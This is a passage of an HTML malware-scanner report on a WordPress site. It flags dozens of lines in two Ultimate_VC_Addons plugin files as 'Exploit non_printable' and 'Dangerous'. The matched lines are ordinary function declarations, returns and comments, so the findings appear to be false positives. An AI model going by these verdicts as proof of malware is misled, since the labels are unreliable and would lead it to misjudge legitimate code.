#007700">|</span><span style="color: #0000BB">schallfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">tempfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">userfu</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_405").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/woocomposer/woocomposer.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.76 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 20</span><br><table id="file_406" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$found</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 170</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 178</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woo_product_search</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 211</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woo_product_categories</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 246</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 264</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">front_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$post </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 321</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_woocomposer</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 337</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_admin_notice_for_version</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 347</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_admin_notice_for_vc_activation</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generate_shortcode_params</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 357</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'has_shortcode' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 363</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$shortcode </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 370</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 372</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$found</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 37</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 380</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">our </span><span style="color: #007700">final </span><span style="color: #0000BB">results</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woo_query_builder</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">( </span><span style="color: #0000BB">wp_strip_all_tags</span><span style="color: #007700">( </span><span style="color: #0000BB">$value </span><span style="color: #007700">) ) ); </span><span style="color: #FF8000">// phpcs:ignore WordPress.PHP.DiscouragedPHPFunctions.obfuscation_base64_decode</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_406").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/lib/notices/class-astra-notices.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 9.77 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 34</span><br><table id="file_407" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">plugin_dir_url</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">); } return; } } </span><span style="color: #0000BB">Astra_Notices</span><span style="color: #007700">::</span><span style="color: #0000BB">get_instance</span><span style="color: #007700">(); endif;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 104</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_notice</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 114</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dismiss_notice</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 149</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enqueue_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 166</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 168</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sort_notices</span><span style="color: #007700">( </span><span style="color: #0000BB">$array1</span><span style="color: #007700">, </span><span style="color: #0000BB">$array2 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$array1</span><span style="color: #007700">[</span><span style="color: #DD0000">'priority'</span><span style="color: #007700">] - </span><span style="color: #0000BB">$array2</span><span style="color: #007700">[</span><span style="color: #DD0000">'priority'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 185</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">show_notices</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 239</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">markup</span><span style="color: #007700">( </span><span style="color: #0000BB">$notice </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 268</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">Notice wrapper classes</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 270</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_wrap_classes</span><span style="color: #007700">( </span><span style="color: #0000BB">$notice </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 282</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">( </span><span style="color: #0000BB">implode</span><span style="color: #007700">( </span><span style="color: #DD0000">' '</span><span style="color: #007700">, </span><span style="color: #0000BB">$classes </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 292</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Notice id</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_notice_id</span><span style="color: #007700">( </span><span style="color: #0000BB">$notice</span><span style="color: #007700">, </span><span style="color: #0000BB">$key </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 296</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$notice</span><span style="color: #007700">[</span><span style="color: #DD0000">'id'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 299</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'astra-notices-id-' </span><span style="color: #007700">. </span><span style="color: #0000BB">$key</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 308</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 310</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_expired</span><span style="color: #007700">( </span><span style="color: #0000BB">$notice </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 322</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 330</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 340</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">mixed URL</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 342</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_get_uri</span><span style="color: #007700">() { </span><span style="color: #FF8000">// phpcs:ignore PSR2.Methods.MethodDeclaration.Underscore</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 348</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trailingslashit</span><span style="color: #007700">( </span><span style="color: #0000BB">get_template_directory_uri</span><span style="color: #007700">() . </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">( </span><span style="color: #0000BB">$theme_dir</span><span style="color: #007700">, </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$path </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 350</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">plugin_dir_url</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 355</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return; </span><span style="color: #FF8000">// phpcs:ignore Squiz.PHP.NonExecutableCode.ReturnNotRequired</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">object initialized object of </span><span style="color: #007700">class.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_instance</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 68</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$instance</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 76</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 84</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns a </span><span style="color: #007700">list </span><span style="color: #0000BB">of allowed tags </span><span style="color: #007700">and </span><span style="color: #0000BB">attributes </span><span style="color: #007700">for </span><span style="color: #0000BB">a given context</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 89</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return Array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 91</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_data_attributes</span><span style="color: #007700">( </span><span style="color: #0000BB">$allowedposttags</span><span style="color: #007700">, </span><span style="color: #0000BB">$context </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 94</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$allowedposttags</span><span style="color: #007700">;</span>
</span>
